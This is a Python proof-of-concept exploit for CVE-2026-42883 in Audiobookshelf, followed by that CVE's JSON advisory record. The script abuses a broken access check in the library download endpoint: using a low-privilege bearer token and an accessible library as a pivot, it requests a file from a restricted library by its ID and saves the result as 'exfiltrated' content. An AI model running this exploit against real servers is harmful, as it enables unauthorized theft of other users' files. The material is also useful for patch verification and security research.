CVE-2026-42883

import requests # Target configuration target_host = "http://localhost:13378" # Attacker's credentials (Low privilege user with access to Library A) auth_token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..." # Headers headers = { "Authorization": f"Bearer {auth_token}", "Content-Type": "application/json" } # Scenario: Attacker has access to Library ID 'lib_01', but wants to download a file from restricted Library 'lib_02' # The endpoint checks access to 'lib_01' but downloads file by its direct ID. # The ID of the library the attacker has access to accessible_library_id = "lib_01" # The ID of the target file belonging to a restricted library (Obtained via enumeration or guessing) target_file_id = "file_secret_id_in_lib_02" # Construct the malicious URL # The server checks access to 'accessible_library_id', then fetches 'target_file_id' exploit_url = f"{target_host}/api/libraries/{accessible_library_id}/download" payload = { "id": target_file_id, # The vulnerable parameter "type": "book" } print(f"[+] Attempting to download file {target_file_id} using library {accessible_library_id} as a pivot...") try: response = requests.get(exploit_url, headers=headers, params=payload, stream=True) if response.status_code == 200: print("[+] Exploit successful! File content received.") filename = f"exfiltrated_{target_file_id}.m4b" with open(filename, "wb") as f: for chunk in response.iter_content(chunk_size=8192): f.write(chunk) print(f"[+] File saved as {filename}") else: print(f"[-] Exploit failed. Status code: {response.status_code}") print(response.text) except Exception as e: print(f"[-] An error occurred: {e}")

{"cve": {"id": "CVE-2026-42883", "sourceIdentifier": "[email protected]", "published": "2026-05-11T20:25:44.593", "lastModified": "2026-05-11T20:25:44.593", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Audiobookshelf is a self-hosted audiobook and podcast server. Prior to 2.32.2, the GET /api/libraries/:id/download endpoint validates that the requesting user has access to the library specified in the URL path, but fetches downloadable items solely by attacker-provided IDs without constraining them to that library. An authenticated user with download permission and access to any one library can exfiltrate the full file contents of items belonging to any other library, including libraries they are explicitly denied access to. This vulnerability is fixed in 2.32.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-863"}]}], "references": [{"url": "https://github.com/advplyr/audiobookshelf/security/advisories/GHSA-6rvg-w3f5-9gq5", "source": "[email protected]"}]}}